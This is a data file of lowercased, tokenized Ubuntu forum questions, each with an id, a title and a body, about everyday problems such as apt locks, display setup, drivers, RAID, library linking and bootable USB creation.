372543	issues running commands	every time i run a command i get this back . e : could not open lock file /var/lib/apt/lists/lock - open ( 13 : permission denied ) e : unable to lock directory /var/lib/apt/lists/ e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? christopher @ christopher : ~ $ this did n't start happening until i changed my device name .
372545	accidentally changed dual monitor setup and do n't know how to reset it	i have a dual monitor setup with my laptop and an external asus monitor running under ubuntu 11.10 . when i first started using ubuntu , it synced both screens . what showed up on my laptop showed up on my eternal monitor . last night , i accidentally knocked the hdmi cable from its port ( not that unusual in the tight space i work in ) . when i plugged it back in , as usual , the external monitor only displayed my wallpaper . usually , i just restart ubuntu and it resets , but last night what i now realize was the display console came up and somehow i changed the setup . now the two screens show different jobs so to speak . also , the external monitor does n't display the ribbon , making switching between firefox tabs and windows or apps jarring . i write for a living and need to quickly check bits of research , notes or sources while writing and the extra switching between mouse pad and external mouse to get one or the other screen to respond interrupts my work flow . the only technical help i can offer is when the display console popped up , the graphical representation of the screens was that the external screen appeared layered over by about one-quarter of the laptop screen . again , these were icons . i tried to replicate that after i obviously screwed things up . if someone could help . i would appreciate it . if i have to use terminal , that 's fine . i started using computers for writing back when they were green dos prompts . there 's a certain elegance to prompt commands to me . maybe it 's the writer in me . again , if anyone can help me return my screens to sync under ubuntu 11.10 , i would greatly appreciate it .
372546	screen brightness control does n't work after update	i just installed xubuntu 12.04 on my toshiba satellite laptop . out of the box , everything worked fine . i could change the screen brightness with the fn keys , and it changed automatically when switching to battery . a couple of days ago , i did an update , and when i restarted , the screen brightness seems to be fixed at 100 % . when i press the fn keys , i get the popup that tells me what brightness level it should be at , but it does n't change . i do n't know what would have changed in the last round of updates that would have borked my brightness control . i tried enabling the amd proprietary driver , but that did n't help . any ideas ?
372548	libwebkitgtk can not find libgl even though it exists	i have a problem with libwebkitgtk-3.0 the problem is that software-center crashes on startup . the problem is that libwebkitgtk can not find libgl . when i run ldd /usr/lib/libwebkitgtk-3.0.so |grep not and the result was libgl.so.1 = > not found now libgl exists . i ran locate libgl.so.1 and i got the following /usr/lib/i386-linux-gnu/libgl.so.1 /usr/lib/i386-linux-gnu/libgl.so.1.2 /usr/local/matlab/matlab_production_server/r2013a/sys/opengl/lib/glnxa64/libgl.so.1 /usr/local/matlab/matlab_production_server/r2013a/sys/opengl/lib/glnxa64/libgl.so.1.5.070200 i tried making a symbolic link of libgl.so.1 in /usr/lib/x86_64-linux-gnu but still no luck . i even tried a link in /usr/lib but still libwebkitgtk can not find it ! i tried reinstalling webkit but that did n't fix it either . what should i do to make sure libwebkitgtk can find libgl ?
372549	system does not detect usb pendrives	this usb thing is driving me crazy . 2 problems in time span of 3 hours . ok i was already trying to cope up with `` wrong fs type , bad option , bad superblock '' error while mounting fat drives when to my amazement i discovered that none of the usb storage devices showed up in the system useful outputs : - tail /var/log/syslog : root @ shubham-pc : ~ # tail /var/log/syslog nov 7 21:41:47 shubham-pc colord : device removed : sysfs-hp-v250w nov 7 21:41:51 shubham-pc kernel : [ 3441.529542 ] usb 1-1 : usb disconnect , device number 11 nov 7 21:41:53 shubham-pc kernel : [ 3443.820029 ] usb 1-2 : new high-speed usb device number 14 using ehci-pci nov 7 21:41:54 shubham-pc kernel : [ 3443.952897 ] usb 1-2 : new usb device found , idvendor=0781 , idproduct=5530 nov 7 21:41:54 shubham-pc kernel : [ 3443.952905 ] usb 1-2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 nov 7 21:41:54 shubham-pc kernel : [ 3443.952909 ] usb 1-2 : product : cruzer nov 7 21:41:54 shubham-pc kernel : [ 3443.952913 ] usb 1-2 : manufacturer : sandisk nov 7 21:41:54 shubham-pc kernel : [ 3443.952917 ] usb 1-2 : serialnumber : 20060876420ec6016847 nov 7 21:41:54 shubham-pc mtp-probe : checking bus 1 , device 14 : `` /sys/devices/pci0000:00/0000:00:1d.7/usb1/1-2 '' nov 7 21:41:54 shubham-pc mtp-probe : bus : 1 , device : 14 was not an mtp device
372551	install ubuntu and partation issue	i have a windows vista in my desktop . c drive has 320 gb size . i wanted install an ubuntu on it as well . so i installed it from ubuntu livecd , the screen asked me to partition a default size . roughly , vista would have 50 % size say 160gb and the rest 50 % would be for ubuntu . during the installation , i played and toggled the button `` continue '' and the other one ( i forgot the name and i should not do it ) . the machine froze , i manually power off the machine . when i restart the desktop and look at the c drive size , it only has 160 gb shown . so how can do it ? to reinstall it or use a partition tools to recover the lost space ?
372552	problems with ubuntu 13.04 upgrading	after upgrading to ubuntu 13.04 , on the top marging to the left of the language indicator , it appears a red circle with a white line in it , and i can not open the software updater to solve this problem . the performance is normal , however from time to time i have to restart my netbook .
372554	error when linking two dynamic libraries on ubuntu 12.04	there are two libraries : first library - libhello.so cat hello_child.c # include `` hello_child.h '' int put_my_msg ( char *messg ) { printf ( messg ) ; return -1 ; } ; cat hello_child.h # include < stdio.h > int put_my_msg ( char* ) ; to build th command : gcc -c -fpic -o hello_child.o hello_child.c gcc -shared -o libhello.so hello_child.o here all is well , the library is created second library - libhello2.so cat hello_child2.c # include `` hello_child.h '' # include `` hello_child2.h '' int put_my_msg2 ( char *messg ) { put_my_msg ( messg ) ; return -1 ; } ; cat hello_child2.h # include < stdio.h > int put_my_msg2 ( char* ) ; to build th command : gcc -c -fpic -o hello_child2.o hello_child2.c gcc -shared -l. -lhello -o libhello2.so hello_child2.o this library is also normal is going , but when viewing the list of libraries linking command : ldd libhello2.so linux-gate.so.1 = > ( 0xb77dc000 ) libc.so.6 = > / lib/i386-linux-gnu/libc.so.6 ( 0xb7619000 ) /lib/ld-linux.so.2 ( 0xb77dd000 ) that is , we do not have a dependency library libhello.so as a result in the test program hello_main.ń : # include `` hello_child2.h '' int main ( int argc , char * argv [ ] ) { char * messg = `` hello world ! \ n '' ; int res = put_my_msg2 ( messg ) ; return res ; } ; when it is compiled gcc hello_main2.c-bdynamic-l. /-lhello-lhello2-o hello an error : .//libhello2.so : undefined reference to `put_my_msg' i 'm using ubuntu 12.04 x86 , gcc 4.6.3 ( ubuntu / linaro 4.6.3-1ubuntu5 ) how to fix this error ? i tried the same on opensuse and there is no such problem .
372556	if i install jdk do i also need to install jre	if i install jdk 1.7 do i also need to install jre 1.7 to support tomcat ? i have installed the openjdk package and that seems to include jre . java -version shows that java 1.7 has been installed
372561	unable to install hp printer ( moving this to my regular account )	i have tried to install my hp laserjet 1020 on ubuntu 13.10 and it says installing plugin then nothing happends . it detects it and all but nothing works . i tried multple guides online but nothing fixes it whatsoever
372564	how to install the newest mono ?	i want to install the newest version of mono on my ubuntu 13.10 installation , but obviously it requires me to download a lot of packages from the debian website , which is not ideal as it is hard to fix up dependencies . ( + they 'll all be marked as manually installed ) i am aware i can install mono from source but i 'd prefer not to . how do i add a debian ppa to my package managers , so i can just install it with aptitude or apt ?
372565	installing ubuntu from an usb with limited conditions	here is my situation : i have 2 computers , one with windows 8 and another ( a laptop ) in which i want to install ubuntu from an usb flash ( currently i do n't have any operative system installed in the laptop ) . my intentions are to use the former computer to prepare the usb installer , i can not download any auxiliary software . i also have the iso file : `` ubuntu-12.04-desktop-amd64.iso '' and my flash capacity is 8 gb . i already tried making the flash booteable from the windows command prompt and then coping the files inside the iso but this seems not work . can anybody help me to install ubuntu in my laptop in this particular situation ? is that possible ? thanks in advance for any help .
372566	how can i modify the live installer to include additional packages ?	i would to modify the lubuntu installer ( as usb installer with persistent home ) including additional packages like tex-live and math-related stuff for my fellow classmates . how can i do that ? the final aim is to provide a lubuntu system with persistent home in a usb stick with additional packages and keeping the installer .
372567	network configuration in lxc- unable to ping ips except lxc container ip	i have installed ubuntu server 12.04 . i have installed lxc container . i started lxc container using lxc-start -n conrainername logged in using lxc-console -n contaniername -t 1 . i prompted to login , i entered ubuntu/ubuntu as username and password . i try to configure network for lxc . this is what i have tried ubuntu @ containername : $ nano /etc/network/interface auto lxcbr0 iface eth0 inet static bridge_ports eth0 address xxx.xxx.xxx.xxx # static ip netmask 255.255.255.xxx gateway xxx.xxx.xxx.xxx # our gateway ip broadcast xxx.xxx.xxx.xxx dns-nameservers xx.xx.xx.xx xx.xx.xx.xx.xx then i restarted lxcbr0 as sudo ifdown lxcbr0 sudo ifup lxcbr0 after this i can able to ping lxc container 's ip but not system ip or any other ip . ping xxx.xxx.xxx.xxx ( lxc container ip ) reachable 0 % packet loss ping 8.8.8.8 destination host unreachable 100 % packet loss what would be the problem ? note : i have two static ips to assign for both system and lxc container . systems static ip is working fine but not lxc container .
372570	`` airport express '' server in ubuntu server	is there a way to `` create '' an ubuntu server that allows to stream all my music to my airport express ? with the possibility to manage it through my mac and iphone ? and if i disable anything , except the airport and the ubuntu machine , it still play 's ? thanks .
372573	how do you copy date and time displayed in the top panel ?	i remember that some versions back , you could copy the date and time displayed in the top panel . all you had to do was to click the right mouse button , select copy date and time and you could paste it anywhere . recently , i do not see it any more . has the feature been withdrawn ? or has the default configuration been changed and i can bring it back by some simple reconfiguration ?
372576	cant use ralink rt3290 wifi in ubuntu 12.04 on hp	i have tried the different posts on this forum and others to get my wifi working but havent succeeded . the system summary is given below for reference . asad *************** info trace *************** ***** uname -a ***** linux lenovo-15 3.2.0-55-generic # 85-ubuntu smp wed oct 2 12:29:27 utc 2013 x86_64 x86_64 x86_64 gnu/linux ***** lsb_release ***** distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise ***** lspci ***** 07:00.0 network controller [ 0280 ] : ralink corp. rt3290 wireless 802.11n 1t/1r pcie [ 1814:3290 ] subsystem : hewlett-packard company device [ 103c:18ec ] kernel driver in use : rt2860 -- 08:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 07 ) subsystem : hewlett-packard company device [ 103c:1970 ] kernel driver in use : r8169 ***** lsusb ***** bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 002 : id 0bda:571c realtek semiconductor corp. ***** pcmcia card info ***** ***** iwconfig ***** ra0 ralink sta link quality:0 signal level:0 noise level:0 rx invalid nwid:0 invalid crypt:0 invalid misc:0 ***** rfkill ***** 0 : hp-wifi : wireless lan soft blocked : no hard blocked : no 1 : hp-bluetooth : bluetooth soft blocked : no hard blocked : no ***** lsmod ***** rt3290sta 1182383 0 ***** nm-tool ***** networkmanager tool state : connected ( global ) - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : connected default : yes hw address : < mac address removed > capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 192.168.10.3 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.10.1 dns : 192.168.10.1 ***** networkmanager.state ***** [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true ***** networkmanager.conf ***** [ main ] plugins=ifupdown , keyfile dns=dnsmasq [ ifupdown ] managed=false ***** interfaces ***** auto lo iface lo inet loopback ***** iwlist ***** ***** resolv.conf ***** nameserver 127.0.0.1 ***** blacklist ***** [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac blacklist rt2800pci blacklist rt2x00pci [ /etc/modprobe.d/blacklist-local.conf ] blacklist fglrx_experimental_13 ***** modinfo ***** filename : /lib/modules/3.2.0-55-generic/kernel/drivers/net/wireless/rt3290sta.ko version : 2.6.0.0_rev1 srcversion : 13f483178c6df2e02d874c3 alias : pci : v00001814d00003290sv*sd*bc*sc*i* depends : vermagic : 3.2.0-55-generic smp mod_unload modversions parm : mac : rt28xx : wireless mac addr ( charp ) ***** udev rules ***** # pci device 0x10ec : /sys/devices/pci0000:00/0000:00:1c.1/0000:08:00.0 ( r8169 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x1814 : /sys/devices/pci0000:00/0000:00:1c.0/0000:07:00.0 ( rt2800pci ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 '' ***** dmesg ***** [ 19.082601 ] rt3290sta : module license 'unspecified ' taints kernel . [ 19.084533 ] rt2860 0000:07:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 19.084562 ] rt2860 0000:07:00.0 : setting latency timer to 64 [ 21.101502 ] < ==== rt28xx_init , status=0 [ 1661.866927 ] rt2860 0000:07:00.0 : setting latency timer to 64 ****************** done ******************
372580	issue getting mysql to work correctly	i am installing a custom app that needs mysql , which i already had working so i am a bit confused on whats going on . anyways here is the error error loading mysqldb module : this is mysqldb version ( 1 , 2 , 4 , 'final ' , 1 ) , but _mysql is version ( 1 , 2 , 3 , 'final ' , 0 tried sudo pip uninstall mysql-python then sudo pip install mysql-python which worked ... successfully installed mysql-python still the same error error loading mysqldb module : this is mysqldb version ( 1 , 2 , 4 , 'final ' , 1 ) , but _mysql is version ( 1 , 2 , 3 , 'final ' , 0
372581	how can i solve this apt-get problem when installing phppgadmin ?	errors were encountered while processing : phppgadmin e : sub-process /usr/bin/dpkg returned an error code ( 1 )
372584	i ca n't get online video to work correctly - see screen caps	marc @ hmst-rm139-84044 : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 13.04 release : 13.04 codename : raring small , older machine , i installed lubuntu , so the desktop is lxde . sound works , but video is strangely distorted . any advice ? youtube : npr
372585	why username has been appended to /media directory in ubuntu 13.10 ?	so far , removable disks , when inserted , got mounted at some directory with name in the form /media/ < device volume name > . but in ubuntu 13.10 , i find that the format has been changed . now this has become /media/ < username > / < device volume name > . any idea why this change was made ? some security improvement ? more containment ? one can only guess . because once you get accustomed to accessing your mounted volumes in some way , then this change causes a certain slowness ( and confusion ) , specially if you have two machines with different versions of ubuntu .
372586	how do i mount my ipod touch 5g on ubuntu 13.04	i get the following message when i plug-in my ipod touch 5g to my computer running ubuntu 13.04 the device “rick 's ipod touch” is locked . enter the passcode on the device and click “try again” . however , i 'm not prompted on either the ipod or computer for the passcode . on the ipod , all i get is a pop-up asking if i should `` trust '' or `` do n't trust '' the computer . i press on `` trust '' and nothing happens .
372588	remount raid 5 array	i reinstalled my operating system ( now a kubuntu 13.10 x64 ) and i need to remount my fake raid 4 ( 3 disks ) . can someone help with ideas ? sudo dmraid -r /dev/sde : isw , `` isw_bbcbheecjj '' , group , ok , 3907029166 sectors , data @ 0 /dev/sdd : isw , `` isw_bbcbheecjj '' , group , ok , 3907029166 sectors , data @ 0 /dev/sdc : isw , `` isw_bbcbheecjj '' , group , ok , 3907029166 sectors , data @ 0 sudo mdadm -- assemble -- scan mdadm : container /dev/md/imsm0 has been assembled with 3 drives mdadm : started /dev/md/raid5 with 3 devices sudo mount -t ext4 /dev/md/raid5 /data mount : wrong fs type , bad option , bad superblock on /dev/md126 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so what am i doing wrong ? edit : cat /proc/mdstat personalities : [ raid6 ] [ raid5 ] [ raid4 ] md126 : active raid5 sdd [ 2 ] sdc [ 1 ] sde [ 0 ] 3907023872 blocks super external : /md127/0 level 5 , 128k chunk , algorithm 0 [ 3/3 ] [ uuu ] [ === > ... ... ... ... ... .. ] resync = 16.4 % ( 321975552/1953512064 ) finish=171.9min speed=158160k/sec md127 : inactive sde [ 2 ] ( s ) sdc [ 1 ] ( s ) sdd [ 0 ] ( s ) 7548 blocks super external : imsm can i cancel the sync ?
372589	facebook and msn not connecting in ubuntu 13.10	in 12.04lts it all works fine but in 13.10 neither facebook nor msn connects . seriously i wish ubuntu will go back to pidgin that just works fine without any issues .
372593	how do i recover all the partitions listed in testdisk ?	while trying to reinstall ubuntu alongside windows 8.1 . i chose the option erase and reinstall which formatted my hard disk . i used deep search in test disk on a live usb and got to the following screen : now originally in windows i had an windows 8 os partition , a lenovo partition , 2 partitions called new volume which i had created . now how do i proceed such that i can boot from windows and access all the above partitions ? also , why are there so many hpfs-ntfs partitions ? i 've found that those partitions on the list which do n't have [ partitionname ] next to them say that they 're damaged when p ( file list ) is pressed . also , pbr_drv seems to contain files for lenovo one-key recovery . when i request the file list of the partitions with [ ] next to them , they seem to list all the folders i had in them pre-disaster .
372594	problem with installing nvidia display drivers on ubuntu 13.10	hello everyone and thank you for taking a look at this topic ! i 'm currently trying out ubuntu 13.10 but i keep hitting a wall when it comes to installing a driver . i 've tried : sudo apt-get install nvidia-current this resulted in a un-bootable system . the screen just stayed black and the cursor displayed as an 'x ' . after that i did had to re-install ubuntu . the computer i 'm using is an acer-aspire-v3 with a build in nvidia geforce gt 630m and also with a intel hd graphics chip-set ( not sure if chip-set is the right word here ) . `` lspci | grep vga '' output : pascal @ pascal-aspire-v3-571g : ~ $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108m [ geforce gt 630m ] ( rev a1 ) i 've searched a bit here and there and found out that it would be wise to mention that this laptop is using ( or so i think ) nvidia optimus , not sure if it will add anything to the subject but at least i 'll mention it just to be sure . now to the questions : q1 how is this caused and how can i fix it ? q2 what additional information could i provide to help you help me ?
372595	system freezes , what logfile should i look in ?	i run ubuntu 13.10 runnig from an usb ssd disk . i use mdadm raid6 of six disk for storage , fuse for rar2fs , plexmediaserver and qbittorrent . i 'm looking in syslog , kern.log and other logfiles but i ca n't find anything . those anyone have an idea where to search for errors ?
372599	is there a sample project of an indicator which makes a call to a remote service in 13.10 ?	i 'd like to look into making an indicator for 13.10 which keeps me up to date by pulling from data on a remote service , and , if possible , in future , allows me to interact with it , e.g . trigger a build , move to the next track playing etc . while there seems to be a fair bit of documentation regarding indicators http : //developer.ubuntu.com/resources/technologies/application-indicators/ an example that works out of the box , that i could play around with , would be the perfect start . can anybody point me to either a sample project that i can install or , failing that , the source of an indicator they feel is well built and happens to grab some data remotely ? ideally this indicator would be written in python or c # . even better , is there a list of official indicators ( by official i mean in the ubuntu repos as oppose to a ppa ) that i could look at ? if so are indicators packaged separately and thus is there a way for me to look at the source of all my installed indicators or do they typically come packaged with their application ?
372600	is it possible to use subtitles with sushi ( gnome-sushi ) ?	i have read here that the sushi previewer can be used as video player and that it supports subtitles . `` sushi can be used as a video player , it seems to use a clutter interface as well and seems to work better than snappy ( it can play with subtitles and cool fullscreen mode , for instance ) '' i have installed it and it can be started as video player by selecting the video and using the space key . but how about subtitles ?
372601	how to start in background a list of applications on login	i observed the following thing : i login on my computer account . i run in the terminal some-app i wait about 20 seconds to start . then i close it . i run same command in terminal . it start in about 1 or 2 seconds . i understood that this is called cache . can anybody explain how does this work ? also , what command must i run to make a fake start of the some-app to start quickly when i want to open it in ui ? i imagine that having a list of app names that i would pseudo-start on login will improve my ubuntu experience . note that i do n't want to start the application in the ui , just to initialize it somewhere in the background so when clicking the icon from the desktop to start very quick .
372603	xhost not persisting the access control list in 12.04	i logged in a my user account into the system . then , i open a terminal window , su to another user . tried invoking leafpad or thunar from command line . it gives error ca n't open display , no protocol specified . so i exit and run the command xhost +si : localuser : username then i did su login to another user . invoking leafpad or thunar from command line works . then i restart my system . all the changes are gone . how to make it persistent ? i changed 60x11_xhost file inside x11/xsession.d/ folder manually . but i am looking for elegant solution . i am worried if some os update will remove the change . i do not want to use sux utility either . i also have an opensuse laptop , there it works even for su login . there is no issues at all . is x11 implementation different in these os ?
372605	how can i reenable the back button in evince on ubuntu 13.10 ?	can not find the back button in evince 3.10.0 , ubuntu 13.10 . there used to be a back button which can be added to the menu bar . it simply offers the ability to jump back from url in the pdf . now its gone : ( anyone know how to get it back ?
372606	notification box does n't go away in xubuntu	i just installed xubuntu 13.10 on my msi wind netbook . i had no problems with the previous version 13.04 , but the first thing i noticed with this latest version is that the brightness osd stays on the screen and even if i use the hotkeys to brighten or dim my screen , nothing happens with my display . furthermore , the volume controls in my taskbar do n't work either and some weird things are happening in the settings app , like flickering sliding bars . i found another post that says if you use the the code : killall /user/lib/notification-daemon/notification-daemon the notifications should work again . however , when i tried that command in my terminal , xubuntu told me it found no such file or directory .
372607	how to create a bootable ubuntu usb flash drive from terminal ?	is there any way to create a bootable ubuntu usb flash drive from the terminal without using any third-party applications like yumi , unetbootin , etc . i tried to create a bootable ubuntu flash drive with dd method , sudo umount /dev/sdb sudo dd if=/path/to/ubuntu.iso of=/dev/sdb bs=1m it create files on the usb disk , but when i try to boot the usb disk it shows a operating system not found error .
372610	usb video adapters for ubuntu 13.10	has anyone found a usb video adapter that works with ubuntu 13.10 ? i am using a dell laptop in a docking station to provide two monitors just fine , and i would like some method of powering a third . i have a startech usb2dvie3 in place now and it works just fine in windows , but ubunutu only recognizes it as a `` magic communications technology co '' device and wont recognize it as a display . any advice on getting this one to work , or an alternate device to accomplish this goal ?
372612	fapws3 server restart gives warning and service is unavailable	i run a fapws3 server for my django project on a virtual develoment server and all worked fine . after a standard settings changing of a template directory my server would n't start again . instead a http-request returns `` the service is not available . please try again later. '' . additionally : if i run sudo /etc/init.d/fapws3 restart the return is restarting fapws3 : fapws3start-stop-daemon : warning : failed to kill 7786 : no such process start-stop-daemon : warning : failed to kill 7802 : no such process start-stop-daemon : warning : failed to kill 7806 : no such process start-stop-daemon : warning : failed to kill 7814 : no such process start-stop-daemon : warning : failed to kill 7820 : no such process which seems to be perfectly correct , because if i check the running processes with ps aux | grep -i manage i only get one process ct 7923 0.0 0.1 3876 824 pts/0 s+ 19:12 0:00 grep -i manage but if i try to kill this by hand , it says kill -9 7923 -bash : kill : ( 7923 ) - no such process as well . this is again correct , because if i run ps aux | grep -i manage it returns me always a higher process id afterwards ( i.e . ) : ct 7935 0.0 0.1 3876 820 pts/0 s+ 19:15 0:00 grep -i manage just running 'sudo /etc/init.d/fapws3 stop ' and 'sudo /etc/init.d/fapws3 start ' does not change anything . any suggestions what i could try to make my server running again ? thanks !
372618	bluetooth doesnt work in dell vostro 2420	i install ubuntu 12.04 on my dell vostro 2420 but the bluetooth does n't show up and wifi signal drops randomly need help with that prob soon 07:00.0 network controller : broadcom corporation device 4365 ( rev 01 ) 09:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 07 ) thank you
372619	problem installation of ubuntu	i recently tried to install ubuntu on my sony vaio laptop ( windows 7 , 64 bits ) . i downloaded the .iso file from ubuntu website and burned it on a dvd . but when i booted the laptop with the dvd , i got first the keypad icon , then chose the language and the choice whether to install or try ubuntu . whatever choice i made , it seems that it stops working , i got a black screen , i could not hear the dvd turning , etc ... i also tried to boot with a usb , same story . and i also tried to boot another computer from the dvd and this time i worked . so i do n't think the cd was n't burned correctly .
372620	black stripe right at screen compaq presario cq40 ubuntu 12.04	had ubuntu 10.10 working fine . suddenly the right side of the screen remained black . aline at the bottom got messy . don know if it is hardware failure . how can i install the right graphic driver . i have generic now or unknown . the first seconds at startup the whole screen lights up . when i change harddrive with windos the same things happens- like a fifth part of the screen at the right side is black
372621	vhs capture devices	hi i have a vhs capture device ecap303 from climaxdigital used on windows 7 i am new to ubuntu but have used the command lsusb with the device connected and come up with id ebia : 2861 empia tech ins i understand that a driver for this device is written into ubuntu 12.10 but what software do i need to use the device to copy vhs tapes and make a dvd copy eg could i use mplayer or vlc media player i hope you can help or suggest a better capture device that might be better i have tried tvtime and can see video both from a vcr and from a freesat box but can not get sound despite trying the recommended steps in the reply can you make any other suggestionsmalcolm @ malcolm-inspiron-one-19a : ~ $ ls -l /dev/video* crw-rw -- -- + 1 root video 81 , 0 nov 18 17:22 /dev/video0 crw-rw -- -- + 1 root video 81 , 1 nov 18 17:25 /dev/video1 malcolm @ malcolm-inspiron-one-19a : ~ $ tvtime -- device=/dev/video1 | arecord -d hw:1,0 -r 48000 -c 2 -f s16_le | aplay running tvtime 1.0.2 . reading configuration from /etc/tvtime/tvtime.xml reading configuration from /home/malcolm/.tvtime/tvtime.xml recording wave 'stdin ' : signed 16 bit little endian , rate 48000 hz , stereo playing wave 'stdin ' : signed 16 bit little endian , rate 48000 hz , stereo mixer : find error : success mixer : ca n't open mixer default , mixer volume and mute unavailable . mixer : ca n't open device default/line , mixer volume and mute unavailable . videoinput : aspect ratio : 0.915254 videoinput : aspect ratio : 0.915254 thank you for using tvtime . thanks regards malc tvtime without audio request malcolm @ malcolm-inspiron-one-19a : ~ $ tvtime running tvtime 1.0.2 . reading configuration from /etc/tvtime/tvtime.xml reading configuration from /home/malcolm/.tvtime/tvtime.xml videoinput : driver wo n't tell us its norm : invalid argument videoinput : ca n't get tuner info : inappropriate ioctl for device your capture card driver : uvcvideo [ integrated_webcam_1.3m/usb-0000:00:1d.7-2/197895 ] does not support full size studio-quality images required by tvtime . this is true for many low-quality webcams . please select a different video device for tvtime to use with the command line option -- device . retrying with : /dev/video1 mixer : find error : success mixer : ca n't open mixer default , mixer volume and mute unavailable . mixer : ca n't open device default/line , mixer volume and mute unavailable . videoinput : aspect ratio : 0.915254 videoinput : aspect ratio : 0.915254 found `` usb device 0xeb1a:0x2861 : usb audio ( hw:1,0 ) '' thank you for using tvtime . malcolm @ malcolm-inspiron-one-19a : ~ $ tvtime with audio request malcolm @ malcolm-inspiron-one-19a : ~ $ tvtime | arecord -d hw:1,0 -r 48000 -c 2 -f s16_le | aplay - running tvtime 1.0.2 . reading configuration from /etc/tvtime/tvtime.xml reading configuration from /home/malcolm/.tvtime/tvtime.xml recording wave 'stdin ' : signed 16 bit little endian , rate 48000 hz , stereo playing wave 'stdin ' : signed 16 bit little endian , rate 48000 hz , stereo videoinput : driver wo n't tell us its norm : invalid argument videoinput : ca n't get tuner info : inappropriate ioctl for device your capture card driver : uvcvideo [ integrated_webcam_1.3m/usb-0000:00:1d.7-2/197895 ] does not support full size studio-quality images required by tvtime . this is true for many low-quality webcams . please select a different video device for tvtime to use with the command line option -- device . retrying with : /dev/video1 mixer : find error : success mixer : ca n't open mixer default , mixer volume and mute unavailable . mixer : ca n't open device default/line , mixer volume and mute unavailable . videoinput : aspect ratio : 0.915254 videoinput : aspect ratio : 0.915254 thank you for using tvtime . i have tried as suggested and still get the error messages copied above but ofcourse without the referance to my internal web-cam but still no sound i wonder if my capture device will work with ubuntu regards malcolm @ malcolm-inspiron-one-19a : ~ $ ls -l /dev/video* crw-rw -- -- + 1 root video 81 , 0 nov 18 17:22 /dev/video0 crw-rw -- -- + 1 root video 81 , 1 nov 18 17:25 /dev/video1 malcolm @ malcolm-inspiron-one-19a : ~ $ tvtime -- device=/dev/video1 | arecord -d hw:1,0 -r 48000 -c 2 -f s16_le | aplay running tvtime 1.0.2 . reading configuration from /etc/tvtime/tvtime.xml reading configuration from /home/malcolm/.tvtime/tvtime.xml recording wave 'stdin ' : signed 16 bit little endian , rate 48000 hz , stereo playing wave 'stdin ' : signed 16 bit little endian , rate 48000 hz , stereo mixer : find error : success mixer : ca n't open mixer default , mixer volume and mute unavailable . mixer : ca n't open device default/line , mixer volume and mute unavailable . videoinput : aspect ratio : 0.915254 videoinput : aspect ratio : 0.915254 thank you for using tvtime . regards malcolm
372622	slow running pc on ubuntu 13.10 with my hardware running gnome	i have an issue with a really slow running pc , after i installed ubuntu . i see that compiz is taking all of the resources so i have upon advice switched to gnome ( i like unity much better ) , but it still runs really slowly ( i can see the slow process off an window opening etc ) . do some of you have any advice on setting and things i can try so my pc will run more smoothly . i have enclosed a picyture of the resource usage and the hardware shortlist .
372627	how do i install vmware-workstation-10.0.1-1379776.i386.bundle	whats sudo sh ? ? am i suppose to type it in a notepad or something ? ? why does it not just have an installer.exe where you just click it and it works ? ? why must linux be so hard ? ? whats wrong with having an .exe to install software ? ? why linux why ! ! ! ! all i want to do is install vmware workstation 10.0 but linux makes it imposable why ! ! ! does anyone know a linux distribution where if you want to install software all you have to do is double click it like in windows ? ? or is linux just for intelligent people only ? ? if someone can answer some of my questions that would be great . thanks for your time : )
372629	ubuntu works in try out but not when installed , how to fix ?	i 've got quite a problem with it , perhaps the problem lies with me but i thought i fixed it , i believe the opposite now ... anyhow , i started off with a 64-bit windows 7 platform and i wanted something new then the same boring windows , i heard about ubuntu before but i did n't see a reason to change it . now i had found my reason , so what did i do was do the installation via an usb , i went `` try out before installation '' first and it worked perfectly , however ... when i installed it , deleted my window 7 and tried to reboot with my fresh oh-so-clean new os , it did n't want to load . at a certain point it said to boot up from a bootable option or something like that . where it came to was that i could n't load it up . now , i wanted to switch back to windows 7 because it did n't work and now i ca n't switch back because my harddrive switched modus because of linux files ( from ntfs to 4ex or something , i forgot ) . i 'm currently typing this in the try out version of ubuntu since i ca n't switch back to either windows 7 or to the installed version of ubuntu . so , my question follows : can i fix it by keeping ubuntu ? because i like ubuntu . also a side note : i 'm a total noob when it comes down to this sort of things .
